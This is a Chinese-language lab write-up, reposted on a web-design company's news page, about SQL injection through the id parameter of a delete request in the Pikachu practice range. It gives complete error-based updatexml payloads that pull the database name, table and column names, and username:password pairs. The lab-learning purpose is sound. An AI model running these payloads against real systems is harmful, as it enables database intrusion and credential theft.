尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

Delete 注入

Delete 注入
📅 发布时间:2026/6/19 3:26:35

Delete 注入

delete注入类型利用bp需要抓包,在靶场输入留言后有删除按钮,点击会像后台发包,我们可以利用这一点向数据库注入

Delete 注入:攻击的是“谁被删除”这个判断条件。

第一步:依旧是找数据库

在id那里修改id的值。

id=58+or+updatexml(1,concat(0x7e,database(),0x7e),1)

为什么有+?

HTTP 协议规定: URL 地址里不能出现原始的空格!一旦服务器(Apache/Nginx)在 URL 里读到空格,它就会觉得“这请求格式不对啊”,直接给你退回一个 400 Bad Request。

image

接下来依旧是:爆表名 -> 爆列名 -> 爆数据。

只不过具体的语法有区别:因为要特定的针对数据库语法(增删改查)中的删。

第二步:爆表名 (找找有没有 users 表)

去 information_schema.tables​ 里翻翻 pikachu 库下面有哪些表。

​58+or+updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e),1)

image

这里还是通过修改limit+0,1 来翻表

第三步:爆列名 (确认账号密码叫什么)

翻到了 users 表,现在我们要看它的列名。

​58+or+updatexml(1,concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1),0x7e),1)

第四步:爆数据 (拿管理员账号密码)

从 users​ 表里提取 admin 的账号和密码。

​58+or+updatexml(1,concat(0x7e,(select+concat(username,0x3a,password)+from+users+limit+0,1),0x7e),1)

遇到加密的密码还是使用​​substr(password, 1, 16)

‍

最后

‍

其实总体的思路与之前都是一样的,进数据库->爆表名 -> 爆列名 -> 爆数据。 只不过具体的有具体的语法区别而已。换汤不换药。

相关新闻

  • 一文吃透Java泛型:从基础到进阶,这些知识点别再混淆了!
  • AMD Ryzen处理器深度调优:SMUDebugTool高级配置实战
  • http头注入

最新新闻

  • 终极指南:ieBetter.js与Sizzle选择器引擎如何在IE6-IE8下实现现代CSS选择器
  • 2026昆明防水补漏维修团队实测盘点TOP4:昆明业主房屋渗漏修缮靠谱选择 - 宅安选房屋修缮
  • 巧用脚本守护:解决macOS iNode安全检查失败与自动断连的自动化方案
  • 美格信解读:从公式到听感,THD与THD+N的实战辨析
  • 从入门到精通:Catcher异常过滤器与参数排除高级用法终极指南
  • 解决Docker Machine文件共享慢问题:NFS替代默认挂载的完整方案

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号